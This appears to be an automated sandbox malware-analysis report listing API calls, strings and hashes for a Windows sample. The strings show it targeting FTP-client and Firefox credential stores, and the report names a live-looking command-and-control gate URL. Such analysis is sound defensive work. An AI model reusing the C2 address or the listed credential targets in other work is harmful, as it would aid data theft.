                                  • Opcode ID: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                                  • Instruction ID: 77f65db424b8dbfecb4d9d0992eed673c7479144c9e59104ccc0ab534344ee26
                                  • Opcode Fuzzy Hash: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                                  • Instruction Fuzzy Hash: D6F0FF31940108BADF21AB50CC42FDD7A78AB64349F1080A6B544F50E0D6B99BE49B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00403FFB: WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                  • Sleep.KERNEL32(00001388,00000000,00000000,?,00000000), ref: 0040FE34
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SleepStartup
                                  • String ID: Client Hash$http://smartoffice-eg.com/include/rili/gate.php
                                  • API String ID: 1372284471-4132270203
                                  • Opcode ID: fefb9ade8517178490491bdd9d004a1fae131c9dd968c43cc41643be630516fc
                                  • Instruction ID: 534881ec054deb94b57e270d36c90eed6f3ef705066acc8506ca45b4f3c416af
                                  • Opcode Fuzzy Hash: fefb9ade8517178490491bdd9d004a1fae131c9dd968c43cc41643be630516fc
                                  • Instruction Fuzzy Hash: B9210171D0024A9ADF31EAE1C9467FF7A74AB40349F10003BE241715E2D7BC4D99DBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(00653BC0,Odin,00000000), ref: 0040A0F4
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocal
                                  • String ID: Odin$SiteInfo.QFP
                                  • API String ID: 2826327444-4277389770
                                  • Opcode ID: af78be6208c25b0e6bbfeab7107f1057ecd0c9329bf1b73b5c9331bfe36ab2bd
                                  • Instruction ID: cb19261180e9835e7d6e10c1a09fddbbd42b6fc3f6f61c88a0af093412c8222d
                                  • Opcode Fuzzy Hash: af78be6208c25b0e6bbfeab7107f1057ecd0c9329bf1b73b5c9331bfe36ab2bd
                                  • Instruction Fuzzy Hash: E501D670500205BAEB213B258C06FAF7E59DB82314F24413BBD10B51E3E67C8EA192ED
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004075E5
                                  • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407619
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040767C
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpenValue
                                  • String ID:
                                  • API String ID: 4012628704-0
                                  • Opcode ID: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                                  • Instruction ID: 85ca958a1271cad8174414d3164074e3ff60ec8eec34d7e66a6ef738b10b5b92
                                  • Opcode Fuzzy Hash: 10ea3502066fe8b52e55fe2e13767115a87fa09241fe0bdf3a2df35634072dad
                                  • Instruction Fuzzy Hash: 44113D3180010DBADF119F90CC41FDEBBB9BF04304F1085B6B515B01A0DB796B919F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • socket.WSOCK32(00000002,00000001,00000006), ref: 0040380F
                                  • connect.WSOCK32(00000000,00000002,00000010,?,00000010,00000002,00000001,00000006), ref: 0040386B
                                  • closesocket.WSOCK32(00000000,00000000,00000002,00000010,?,00000010,00000002,00000001,00000006), ref: 00403876
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketconnectsocket
                                  • String ID:
                                  • API String ID: 643388700-0
                                  • Opcode ID: ac129629eea8013c620051c0a10b820934b058f3314b169090a38560cedcb9a1
                                  • Instruction ID: 08d913eedad497c84f2e0313ceade0e14c6413b499fa458ef27ae104aaf27b56
                                  • Opcode Fuzzy Hash: ac129629eea8013c620051c0a10b820934b058f3314b169090a38560cedcb9a1
                                  • Instruction Fuzzy Hash: 39018832904208AADB10BE758C85BEE769CAF00325F10CA7BB524651D1D7BCCB84D61A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F3BF
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3F3
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F44D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID:
                                  • API String ID: 1332880857-0
                                  • Opcode ID: 3b6d3980a31d2813f4c71fbb97a468a1a3c6339bb194c527c6e3579fa440d198
                                  • Instruction ID: 25757aefe436132530bd79105f2911b35f687820d7f807c11c3c7734766150bd
                                  • Opcode Fuzzy Hash: 3b6d3980a31d2813f4c71fbb97a468a1a3c6339bb194c527c6e3579fa440d198
                                  • Instruction Fuzzy Hash: 5D112A3590010DBADF11AF91CC42FDE7BB9BF00704F1080B6B914B51E1DBB9AA94AF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040F320
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F350
                                  • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040F3A3
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID:
                                  • API String ID: 1332880857-0
                                  • Opcode ID: 1148e6ff8680c2dc0086537a46f6f97085b115a81496529cdce24479f6db0b90
                                  • Instruction ID: 45928e3938db904d05e16263eed0eecc5d6e07d10bcb7dd287d335a9eaebcbfe
                                  • Opcode Fuzzy Hash: 1148e6ff8680c2dc0086537a46f6f97085b115a81496529cdce24479f6db0b90
                                  • Instruction Fuzzy Hash: C6113C31900108BADF11AF91CC02FEE7BB9BF00704F1081B6B914B51E1DBB96A94AF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(?,EasyFTP,80000002,SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32,00000000,00000000), ref: 0040CBAB
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  • EasyFTP, xrefs: 0040CBA3
                                  • SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32, xrefs: 0040CB8D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FreeLocal
                                  • String ID: EasyFTP$SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
                                  • API String ID: 1884169789-2776585315
                                  • Opcode ID: d7ffa5b5a7a6c463c670a1932dc1d4f89c5eac8df5b07f7bf1851ef0603f954c
                                  • Instruction ID: 012631f08c3f720db82d748fc1356d0498b941b070556770c17d11d6cf9e9cf7
                                  • Opcode Fuzzy Hash: d7ffa5b5a7a6c463c670a1932dc1d4f89c5eac8df5b07f7bf1851ef0603f954c
                                  • Instruction Fuzzy Hash: DBF03670580104F9EF117BA1CC47FAD7E76DF10748F20417A7900741F1DAB99B91965C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,00000105), ref: 00401EDC
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00401F11
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocFolderLocalPath
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                  • API String ID: 1254228173-2036018995
                                  • Opcode ID: c28ff4115be80b1519ab409ccd38de52fdf85428ec638eb9e2a82520366f4a1b
                                  • Instruction ID: 7738f67dd9614b2846b3a2efeb9c4eebaa8b985614ff96bd2da1bef5687651b4
                                  • Opcode Fuzzy Hash: c28ff4115be80b1519ab409ccd38de52fdf85428ec638eb9e2a82520366f4a1b
                                  • Instruction Fuzzy Hash: A8018436A0420AEBDB109F54CD02F9EB7A5EB44354F208177F501BB2E0E778DA50DB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00407E8D
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$DirectoryFreeLocalWindowslstrcatlstrcpy
                                  • String ID: \32BitFtp.ini
                                  • API String ID: 2776971706-1260517637
                                  • Opcode ID: bf253a78a308ec90383d1d11479567dfa9aa85f6ac1f14350ba34c5243d2a7d0
                                  • Instruction ID: cbf003877d027d6a197ada6978e58f7ea5a3bd39d8541963de42c9327f17cd29
                                  • Opcode Fuzzy Hash: bf253a78a308ec90383d1d11479567dfa9aa85f6ac1f14350ba34c5243d2a7d0
                                  • Instruction Fuzzy Hash: C3F08970A00108BAEB10BB61CC42FDE791D9B40344F104077B704B51E2DAB99F80969D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,004090A9,nss3.dll,00415F19,?,?,?,?,0040950C,?,?,?), ref: 004024DF
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040250D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID:
                                  • API String ID: 2574300362-0
                                  • Opcode ID: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                                  • Instruction ID: fbc1fe3612a262e3ea9a0b223a66db08094d4ab5f536d4fd90f1adfdd8ad2806
                                  • Opcode Fuzzy Hash: 6732e7a58c27bc06566346bb9b7272300466cfa088261deaf2f8ea774c68ea67
                                  • Instruction Fuzzy Hash: 20F09A732051142ADB106A3AAC4499B6B88E7E33B8B105137E806A62C1E5B9DD8682A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: .xml
                                  • API String ID: 1659193697-2937849440
                                  • Opcode ID: 9484f43de636e9346ef22a3769015ff0628bde49905de24cc56c10d20b63b3e4
                                  • Instruction ID: d50f8ccee8f7243a6a0ed472ec34bd5e2a0a6362bf3d9178c3556d4465c1c39f
                                  • Opcode Fuzzy Hash: 9484f43de636e9346ef22a3769015ff0628bde49905de24cc56c10d20b63b3e4
                                  • Instruction Fuzzy Hash: 69F03A32900108FADF11BBD1CC42ECDBB76AB50308F208576B660B51B0D7B99BA4EB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ExitProcess.KERNEL32(00000000,00000080,00000000,00000000,00000003,00000000,00000000,?,?,00409B44,?,00001000,0000FDEA,00000000,profiles.ini,00000000), ref: 00401F62
                                  • CloseHandle.KERNEL32(00000000,00000000,00000080,00000000,00000000,00000003,00000000,00000000,?,?,00409B44,?,00001000,0000FDEA,00000000,profiles.ini), ref: 00401F6F
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExitHandleProcess
                                  • String ID:
                                  • API String ID: 1046136549-0
                                  • Opcode ID: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                                  • Instruction ID: ff3804100ddf8c199ee2f8612031d1c0044171ab4ec93654cd43e20a2e279d87
                                  • Opcode Fuzzy Hash: aae0be0bb2ecbd40ab9fe935455bc870e6245361f36fb792026b32c129e776f9
                                  • Instruction Fuzzy Hash: C6E04F7235024537EB3155699C83F46258857127A8F104032B345FD2D1DAE9E9D0425C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: gethostbynameinet_addr
                                  • String ID:
                                  • API String ID: 1594361348-0
                                  • Opcode ID: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                                  • Instruction ID: 5e93a2d41fda1c27195ed80854e744a6a241ee01f30d7083f3dbc766825ad624
                                  • Opcode Fuzzy Hash: 714c08619f4502eaee032449eb1ef9973a266bd764f847276e968b64be4354d4
                                  • Instruction Fuzzy Hash: D5E04FB420440A9FCA11AE3DC8428557F987B163B93108333F130EB2F1D778D941A749
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • connect.WSOCK32(00000000,00000002,00000010,?,00000010,00000002,00000001,00000006), ref: 0040386B
                                  • closesocket.WSOCK32(00000000,00000000,00000002,00000010,?,00000010,00000002,00000001,00000006), ref: 00403876
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketconnect
                                  • String ID:
                                  • API String ID: 1323028321-0
                                  • Opcode ID: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                                  • Instruction ID: 2c0b4ed7b26df5b6c8b3ddf8a33cbfcd02c62134e5053cecd8bd2a5708bf71a2
                                  • Opcode Fuzzy Hash: 3eb64ca85f9db12466169f07e7e5c2d865243061ebee63a72645f6ce755d8895
                                  • Instruction Fuzzy Hash: B5D0C972A042046AD700BABA5CC1EBEA69CAF10328F109A7BB526E51C2D5BCC584D629
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0041062F
                                  • ExitProcess.KERNEL32(00000000), ref: 0041064D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountExitProcessTick
                                  • String ID:
                                  • API String ID: 232575682-0
                                  • Opcode ID: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
                                  • Instruction ID: 1157fecdfa7adbe7534eede1c2d4befca9c0b9d0b40d7f3ba9e62a443b5a47ca
                                  • Opcode Fuzzy Hash: 03098564a4423b0794b70d1d0606a8fc149a8030d21a065d1568f8fca50770ea
                                  • Instruction Fuzzy Hash: 26C04C3075510454D79462A295567ED100347D5708F51801BA11A541868CDC0AF6151F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004038D0: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                                  • 6F701E40.WSOCK32(?,?,00000800,00000000), ref: 004039EC
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: F701select
                                  • String ID:
                                  • API String ID: 1268188274-0
                                  • Opcode ID: 69b0589e83bec19c8e9aae5d3ba801705d1d6016f0d4b8e48cd570a5aa8ad3ce
                                  • Instruction ID: 2f40260d67330ca774b86e0443aa4ef1630bdb93cf1b4663f33e685bee7b00eb
                                  • Opcode Fuzzy Hash: 69b0589e83bec19c8e9aae5d3ba801705d1d6016f0d4b8e48cd570a5aa8ad3ce
                                  • Instruction Fuzzy Hash: 3401A171710209AFDF109E24CC41BAB3B9CBB04306F208237B992A61C0D7B8DB559F99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004038D0: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                                  • 6F701E40.WSOCK32(?,?,00000001,00000000), ref: 00403962
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: F701select
                                  • String ID:
                                  • API String ID: 1268188274-0
                                  • Opcode ID: 8ba30d1a5677ca99e0fd7e96cdba028720eae20739a8cff75c56391b3af621e1
                                  • Instruction ID: 8c0b6cfc6c1c11aca7b90cc778563e244997239a44563fd1294608556312e14e
                                  • Opcode Fuzzy Hash: 8ba30d1a5677ca99e0fd7e96cdba028720eae20739a8cff75c56391b3af621e1
                                  • Instruction Fuzzy Hash: 9101BC70204209BBDF10AE95DC82FAE3F69AB0130AF108137F900AA1E1D7B9DB418759
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • send.WSOCK32(?,?,00000000,00000000), ref: 004038AB
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                                  • Instruction ID: 7010a4d4224b84c81328f756437b4738d149add1ed75441a8268b8f5070a40e4
                                  • Opcode Fuzzy Hash: 5237cb5b43bce20ae874b933877cdd6ac94511ecc8540f56170920c69c39cbca
                                  • Instruction Fuzzy Hash: 4BF0E533614308ABEB106E15CC40B9B3B9CEB90759F14883BF901A62C0D3BDDA958359
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401439
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileWrite
                                  • String ID:
                                  • API String ID: 3934441357-0
                                  • Opcode ID: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                                  • Instruction ID: ffb465389c342e6fff0e154865cbb03be69b4e2e252949391933a2331f5ccebc
                                  • Opcode Fuzzy Hash: 0abead393dd6c6aee7a413c553546d88cf46b493f200794402aa322d28499946
                                  • Instruction Fuzzy Hash: 71E06532510119ABCF10DE689C01FDF77A8DB50358F044126F914E61E0E7B5DF50C795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403915
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: select
                                  • String ID:
                                  • API String ID: 1274211008-0
                                  • Opcode ID: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                                  • Instruction ID: 10b725986883f22aabceafb6b3feb490bf47cb93175d073b1889671c1eb66941
                                  • Opcode Fuzzy Hash: 4c60f3b67a82c948399910200c1b47c0ae9333acbf075e6a1ced9f152c3a6a7b
                                  • Instruction Fuzzy Hash: 59F03075500518AEDF20CF50CC81BEABBB8EB14328F1041A2E598E52D0E7F99BC48F95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0041062F
                                  • ExitProcess.KERNEL32(00000000), ref: 0041064D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CountExitProcessTick
                                  • String ID:
                                  • API String ID: 232575682-0
                                  • Opcode ID: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
                                  • Instruction ID: 2fc71ade2e6a0a12d312a71b131b45268222faf8461f3848b8adab9be6287053
                                  • Opcode Fuzzy Hash: 3645a7ea88c7323cbd8617e57a5ccdbe4c73d8c6c1bedb72e55e2349f61f393b
                                  • Instruction Fuzzy Hash: 02C0123021D24099C34157618D6A7C635120B92304F1580AFD0084449399A909D2862F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WSAStartup.WSOCK32(00000101,?), ref: 00404010
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                                  • Instruction ID: 067aa5936d8b9ea5f708c86def76a5f3d8c81cd5d66f0ce82ea66d37eb38fb46
                                  • Opcode Fuzzy Hash: c74a549251bf94bfbbbcfe40021cd955fca6604113e72adbbeb47ea308e6471e
                                  • Instruction Fuzzy Hash: BDB0923161460826EA10A2968C479D6729C4744748F4005A13A5AD12C3EBE5AAC046EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • 756A4620.OLE32(00000000,00000001,?), ref: 00401018
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: A4620
                                  • String ID:
                                  • API String ID: 934745325-0
                                  • Opcode ID: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
                                  • Instruction ID: 6a52ffac9a52bb75e61fdc74f829c3bacd20c516bd36067e767411562a370432
                                  • Opcode Fuzzy Hash: 3b7237234ab769e01ab04899e5e5932dde4cbbb511f78cf9168cf59f11837e65
                                  • Instruction Fuzzy Hash: FFA0113228020030EA20AAA08803FC828020B20B8CF008002BB08280C0C0EA80E08A28
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocLocal
                                  • String ID:
                                  • API String ID: 3494564517-0
                                  • Opcode ID: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                                  • Instruction ID: a02c1daf7142050e978c307995f6bc26c6b3feeb3ea3d743e520ab0cb6cfa48f
                                  • Opcode Fuzzy Hash: c3b6909c240290169a852e486617f39144794642c18f97d4acc290094f2c7c07
                                  • Instruction Fuzzy Hash: 81B092B124030826E250A649C803F5A728C9B50B8CF008022BB45A6282C8A8F9A041AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeLocal
                                  • String ID:
                                  • API String ID: 2826327444-0
                                  • Opcode ID: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
                                  • Instruction ID: 6f7800812ba96fbfdec46f28aef180318072ae253db4b629a7912724480db57a
                                  • Opcode Fuzzy Hash: 5069cc6e7fe4c10538abf4a01635c7b27162fc4643f47307ddecb10484670e1c
